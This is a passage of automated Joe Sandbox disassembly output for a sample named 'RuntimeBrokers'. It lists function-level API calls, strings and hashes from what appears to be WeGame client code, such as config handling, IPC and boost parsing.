                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID: class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __cdecl boost::property_tree::info_parser::read_string<char>(const char *&,bool *)$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\info_parser_read.hpp$expected "$expected end of line after \$unexpected \$unexpected end of line
                                        • API String ID: 2427045233-1274455032
                                        • Opcode ID: bdf1f7e639f077e6b1f32862fcaece2f9c76df5355bdaa0ec57477e08ac6c238
                                        • Instruction ID: bbd9ccbfb6c1e95af9ec79f8bbfda6c475d77aeca2b258f3183ac7ebb67d951c
                                        • Opcode Fuzzy Hash: bdf1f7e639f077e6b1f32862fcaece2f9c76df5355bdaa0ec57477e08ac6c238
                                        • Instruction Fuzzy Hash: 3B51A131944248EEDB11CFE4C844BDEBFF4AF19308FA44599E1807BA91DB796A0DCB61
                                        Function 6C30FF30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124stringnetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strchr.VCRUNTIME140(?,0000003A,00000000,00000000,?,?), ref: 6C30FF69
                                        • memmove.VCRUNTIME140(?,?,00000000,?,?), ref: 6C30FF8E
                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(-00000001), ref: 6C30FFAD
                                        • htons.WS2_32(00000000), ref: 6C30FFE7
                                        • strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,1234567890.), ref: 6C30FFFB
                                        • gethostbyname.WS2_32(?), ref: 6C310053
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: atoigethostbynamehtonsmemmovestrchrstrspn
                                        • String ID: 1234567890.
                                        • API String ID: 532542645-3734169883
                                        • Opcode ID: 3f193e59b52778f5024e97881140c1a228938735cfdf37b2a3b72a12caebfd36
                                        • Instruction ID: 95c5a7892a6718483dc0526f41f6cbd82f94a11a1c22675c0f075465cf24a7f8
                                        • Opcode Fuzzy Hash: 3f193e59b52778f5024e97881140c1a228938735cfdf37b2a3b72a12caebfd36
                                        • Instruction Fuzzy Hash: 62310A767083819FDB14CF34D844BEA77A9BF4A308F048A6DE98587A01EB36D509CB52
                                        Function 6C103D42 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 115COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C103D49
                                        • ??0file_status@filesystem@ierd_tgp@@QAE@W4file_type@12@W4perms@12@@Z.COMMON(00000020,00000000,?,?,6C10389E,00000000,00000000,?,00000000), ref: 6C103DBD
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DBC60,00000000,00000000,B33B76E5,?,ierd_tgp::filesystem::status,00000020,00000000,?,?,6C10389E,00000000,00000000,?,00000000), ref: 6C103DF2
                                        • GetFileAttributesW.KERNEL32(00000000,?,00000000,?,?,?,?,6C3DBC60,00000000,00000000,B33B76E5,?,ierd_tgp::filesystem::status,00000020,00000000), ref: 6C103E0D
                                        • GetLastError.KERNEL32(00000048,6C104D22,00000000,?,B33B76E5,?,?,6C10389E,00000000,00000000,?,00000000,?,00000000,00000000), ref: 6C103D5A
                                          • Part of subcall function 6C0B6B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C438534,6C0B6BB1,6C438538,?,6C0BA235,00000000,?,00000010), ref: 6C0B6B81
                                          • Part of subcall function 6C0B6B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0B6B8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ??0file_status@filesystem@ierd_tgp@@AttributesErrorExceptionExecute_once@std@@FileH_prolog3_LastThrowUonce_flag@1@W4file_type@12@W4perms@12@@terminate
                                        • String ID: $ierd_tgp::filesystem::status
                                        • API String ID: 1821077273-2658930788
                                        • Opcode ID: 47988f78ce0590753f26bb1ed6d854fd7cca2c7c7a0848c3282babd033e4c114
                                        • Instruction ID: 40c0ba66dbeb2d89823ddf892b268e5be19ef728b9d8bde6fb2eddd9a166b887
                                        • Opcode Fuzzy Hash: 47988f78ce0590753f26bb1ed6d854fd7cca2c7c7a0848c3282babd033e4c114
                                        • Instruction Fuzzy Hash: F131C475A00609AFDB118FA8D844FDEB7B8EF59328F504519F914ABB80DB74E846CB50
                                        Function 0047808A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenEventW.KERNEL32(00000002,00000001,?,?,?,00000104), ref: 004781CC
                                        • SetEvent.KERNEL32(00000000,?), ref: 004781F8
                                        • CloseHandle.KERNEL32(00000000), ref: 00478204
                                        • GetLastError.KERNEL32 ref: 00478213
                                        Strings
                                        • TCLS_NETBARMACHINE_[6A49B49D-7774-4057-AD2A-95411C5A1153]_E_, xrefs: 004780DA, 004780EA, 004780F3, 00478118
                                        • [Launch][TCLS_Launcher::NotifyNetBarMachine] OpenEvent failed: %d, xrefs: 0047821A
                                        • [Launch][TCLS_Launcher::NotifyNetBarMachine] event_name: %s, xrefs: 004781AA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Event$CloseErrorHandleLastOpen
                                        • String ID: TCLS_NETBARMACHINE_[6A49B49D-7774-4057-AD2A-95411C5A1153]_E_$[Launch][TCLS_Launcher::NotifyNetBarMachine] OpenEvent failed: %d$[Launch][TCLS_Launcher::NotifyNetBarMachine] event_name: %s
                                        • API String ID: 3535471489-701279974
                                        • Opcode ID: f65c4e2def45878f9bb9cd82a346e7a9f98ce4a6ad17c4cbad7398367516299a
                                        • Instruction ID: 5a0dc13517251b407179f194dac61218cee57ed8dc7bd27ce7cf25ca79764394
                                        • Opcode Fuzzy Hash: f65c4e2def45878f9bb9cd82a346e7a9f98ce4a6ad17c4cbad7398367516299a
                                        • Instruction Fuzzy Hash: 274187B1D406189BEB20DB50CC4ABDD77B9AF58305F4040E9E408E61C2DB765EA5CF59
                                        Function 6C14FF29 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?,00000000,00000410,00000000,00000000,00000000), ref: 6C14FF73
                                        • GetLogicalDriveStringsW.KERNEL32(00000208,?,00000000,00000000,00000000), ref: 6C14FF87
                                        • QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 6C14FFD3
                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14FFE4
                                        • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C150001
                                        • swprintf.LIBCMT ref: 6C150032
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: DeviceDriveLogicalQueryStrings_wcsnicmpmemsetswprintfwcslen
                                        • String ID: %s%s
                                        • API String ID: 2066086647-3252725368
                                        • Opcode ID: 04f5eb3f1fe4237b864d42b4a0c023159097faa007ba503e8b83a21c215c618c
                                        • Instruction ID: bc2ad4259634fc3d84ba2b705404d6ed620ca3d9aed33005e317e15a92c8ab7e
                                        • Opcode Fuzzy Hash: 04f5eb3f1fe4237b864d42b4a0c023159097faa007ba503e8b83a21c215c618c
                                        • Instruction Fuzzy Hash: 5E3186B6A012589BDB10DFA4CC84AEEB3BCBF54748F408166ED29E3540EB35D654CF91
                                        Function 0046E43E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 86COMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfW.USER32 ref: 0046E4F7
                                        • WritePrivateProfileStringW.KERNEL32(ZoneIDRecord,ZoneID,?,00000000), ref: 0046E51D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWritewsprintf
                                        • String ID: ZoneID$ZoneIDRecord$config\LoginQ.dat$tTA$tTA
                                        • API String ID: 1995626314-3529621908
                                        • Opcode ID: 0c97d456007619a07280d179e545d56b89a9a1a5cc68b0d2bda464d710310a82
                                        • Instruction ID: 1c198f27e970d030c971da45686b1c8608fa03b425c1390ce58fc3c6c55ebe1a
                                        • Opcode Fuzzy Hash: 0c97d456007619a07280d179e545d56b89a9a1a5cc68b0d2bda464d710310a82
                                        • Instruction Fuzzy Hash: F8418D70C0528CEEDB10DBA4DD49BCDBBB4AF14308F1481EAE419A72D1DBB85B48DB51
                                        Function 6C0C2C4A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C0C2C76
                                        • GetCurrentProcessId.KERNEL32(?), ref: 6C0C2C7F
                                          • Part of subcall function 6C0B04F0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000,?,?,6C0BCB1C,?,?,%s,%lu,?,?,00000010), ref: 6C0B050C
                                        • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6C0C2CC9
                                        • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 6C0C2CDE
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?), ref: 6C0C2CF6
                                        • GetLastError.KERNEL32 ref: 6C0C2D0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$Mapping$CreateCurrentErrorLastOpenProcessView__stdio_common_vsprintf_smemset
                                        • String ID: %lu_%sLock
                                        • API String ID: 2511982081-778973518
                                        • Opcode ID: 2f870425e6873be3989943458200e6768f9abe004e930578f0e6fbdb5cede194
                                        • Instruction ID: abbaa8130d459b81d8f346ab7e1b63a1f19f14cc68b4e7defd114d43fd61f80b
                                        • Opcode Fuzzy Hash: 2f870425e6873be3989943458200e6768f9abe004e930578f0e6fbdb5cede194
                                        • Instruction Fuzzy Hash: 782104B1700309BFDB20DB24CC89FAB77FCEB19714F104569B656D7981DA70E9458A20
                                        Function 00404180 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70filelibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(?,WgaUninitialize), ref: 004041CC
                                        • FreeLibrary.KERNEL32(0046DEDB), ref: 004041E8
                                        • UnmapViewOfFile.KERNEL32(?,?,0046DEDB), ref: 00407A54
                                        • CloseHandle.KERNEL32(?,?,0046DEDB), ref: 00407A69
                                        • UnmapViewOfFile.KERNEL32(?,?,0046DEDB), ref: 00407A9A
                                        • CloseHandle.KERNEL32(?,?,0046DEDB), ref: 00407AAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CloseFileHandleUnmapView$AddressFreeLibraryProc
                                        • String ID: WgaUninitialize
                                        • API String ID: 1120517688-1707333675
                                        • Opcode ID: e09bd6628b467973b4a05bcc0741b41659243f60f2c1c2637f63d263cd55373e
                                        • Instruction ID: 7ea6ed555ab5255da395c7746825a743c0f153ed002529192a0df1464083adf3
                                        • Opcode Fuzzy Hash: e09bd6628b467973b4a05bcc0741b41659243f60f2c1c2637f63d263cd55373e
                                        • Instruction Fuzzy Hash: 9E3125B02047008BE725DF21D99CB27BAE4BB24304F08481DD982AA7E0D7B9E449DF95
                                        Function 6C0E616F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C0E6179
                                        • ?GetWeGameAppDataPathW@Sys_wrapper@common@ierd_tgp@@SA_NAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,6C3411A4), ref: 6C0E61CA
                                          • Part of subcall function 6C152824: __EH_prolog3_GS.LIBCMT ref: 6C15282E
                                          • Part of subcall function 6C152824: memset.VCRUNTIME140(?,00000000,00000208,000006A0,6C0E5F49,?,6C3411A4), ref: 6C152845
                                          • Part of subcall function 6C152824: memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000208,000006A0,6C0E5F49,?,6C3411A4), ref: 6C152857
                                          • Part of subcall function 6C152824: SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6C15286E
                                          • Part of subcall function 6C152824: ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6C1528AE
                                        • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(config,?,6C3411A4), ref: 6C0E61E6
                                          • Part of subcall function 6C100881: __EH_prolog3_GS.LIBCMT ref: 6C100888
                                          • Part of subcall function 6C100881: ?append_separator_if_needed@path@filesystem@ierd_tgp@@AAEIXZ.COMMON(00000008,0000001C,6C0E60EC,00000008,00000004,6C0E9EAD,?,00000000,?,?,?,0000018C,6C0EA607,?,?,?), ref: 6C1008F7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(6C3411A4), ref: 6C0E61FF
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp, xrefs: 6C0E6223
                                        • cfg_folder_appdata failed, xrefs: 6C0E6237
                                        • config, xrefs: 6C0E61DF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_Pathmemset$??_0path@filesystem@ierd_tgp@@?append_separator_if_needed@path@filesystem@ierd_tgp@@?get_client_version_type@overseas@ierd_tgp@@?get_log_instance@base@@DataFolderGameH_prolog3_catch_Logger@1@Sys_wrapper@common@ierd_tgp@@U?$char_traits@_V012@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@
                                        • String ID: cfg_folder_appdata failed$config$d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp
                                        • API String ID: 4175577088-3990937998
                                        • Opcode ID: d6108321419545d5bc654130c6cd837b2673e27626750daf3373cd511e1b33e6
                                        • Instruction ID: 24c16519f572627eee2e588e9050aed1b7b925820a6fca7bcbaaaaf0aefa4340
                                        • Opcode Fuzzy Hash: d6108321419545d5bc654130c6cd837b2673e27626750daf3373cd511e1b33e6
                                        • Instruction Fuzzy Hash: 0C215970A00608DBDB15DFA8C9947CCB7F16F18708F608499D214BBB81DB79AB09CB91
                                        Function 6C0C2F7A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 6C0C2F8E
                                        • IsWindow.USER32(?), ref: 6C0C2FB0
                                        • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,000007D0,?), ref: 6C0C2FE5
                                        • GetLastError.KERNEL32 ref: 6C0C2FF9
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C0C3013
                                        Strings
                                        • [SimpleIPC]Window already destroyed: %d., xrefs: 6C0C3004
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveMessageSendTimeoutWindow
                                        • String ID: [SimpleIPC]Window already destroyed: %d.
                                        • API String ID: 2514143000-681933670
                                        • Opcode ID: 5b3f1e20acfeb8d7320db92346f6b5f426a9f4d8e47d457c968350e78744826b
                                        • Instruction ID: 17bb02c514c9905b492d6cc103d05a98ab4fa356c2ec6e143daaa8ac6a5e695b
                                        • Opcode Fuzzy Hash: 5b3f1e20acfeb8d7320db92346f6b5f426a9f4d8e47d457c968350e78744826b
                                        • Instruction Fuzzy Hash: AC215C7AB00209EFDF10DF59C844ADE7BF8FB49350B50842AE859E7A40D731E950DB61
                                        Function 6C0F6609 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0F6610
                                          • Part of subcall function 6C0F6725: __EH_prolog3.LIBCMT ref: 6C0F672C
                                        • ?native@path@filesystem@ierd_tgp@@QBEABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,00000064,6C0F6603), ref: 6C0F6662
                                        Strings
                                        • conversion of data to type ", xrefs: 6C0F6673
                                        • hLCl, xrefs: 6C0F6667
                                        • bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_, xrefs: 6C0F66C3
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 6C0F66BE
                                        • " failed, xrefs: 6C0F6695
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?native@path@filesystem@ierd_tgp@@H_prolog3H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                                        • String ID: " failed$bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_$conversion of data to type "$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp$hLCl
                                        • API String ID: 1752058968-1268977617
                                        • Opcode ID: 39d727233bac7a5e89255084c5acb6b7787fa466c2d8d82d62eff5b1876c60a3
                                        • Instruction ID: c23c5b603e90854d6dac9258fdb4e72fa2b1bcba9865bfa124cc27f174c64b3f
                                        • Opcode Fuzzy Hash: 39d727233bac7a5e89255084c5acb6b7787fa466c2d8d82d62eff5b1876c60a3
                                        • Instruction Fuzzy Hash: 1621C070C00288AADB00DBF4C908FDEBFF85F45308F548588E014BB781DB79AA09CBA1
                                        Function 0049C069 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C070
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C07A
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • moneypunct.LIBCPMT ref: 0049C0B4
                                        • std::_Facet_Register.LIBCPMT ref: 0049C0CB
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C0EB
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C109
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                        • String ID: oX
                                        • API String ID: 113178234-1087975772
                                        • Opcode ID: 35f79fd415eb812953b1bdbe3b4731a9ee8970f07be315c1e3409aca5df34941
                                        • Instruction ID: b794a8fe59399e4ab1110aecf75ee4497d6b7b12ab980522f72b18a677ee611f
                                        • Opcode Fuzzy Hash: 35f79fd415eb812953b1bdbe3b4731a9ee8970f07be315c1e3409aca5df34941
                                        • Instruction Fuzzy Hash: 3611A071900118DBDF11EBA5E846AEE7BB4BF54314F24052EF410BB292CB38AA05CB99
                                        Function 6C0AF890 Relevance: 12.2, APIs: 8, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,0FFFFFFF,?,?,?,00000000,00000000,B33B76E5,?,?,00000000), ref: 6C0AF94D
                                        • memmove.VCRUNTIME140(00000000,00000002,?,?,?,00000000,00000000,B33B76E5,?,?,00000000), ref: 6C0AF972
                                        • memset.VCRUNTIME140(00000000,00000000,00000001,00000000,00000002,?,?,?,00000000,00000000,B33B76E5,?,?,00000000), ref: 6C0AF98A
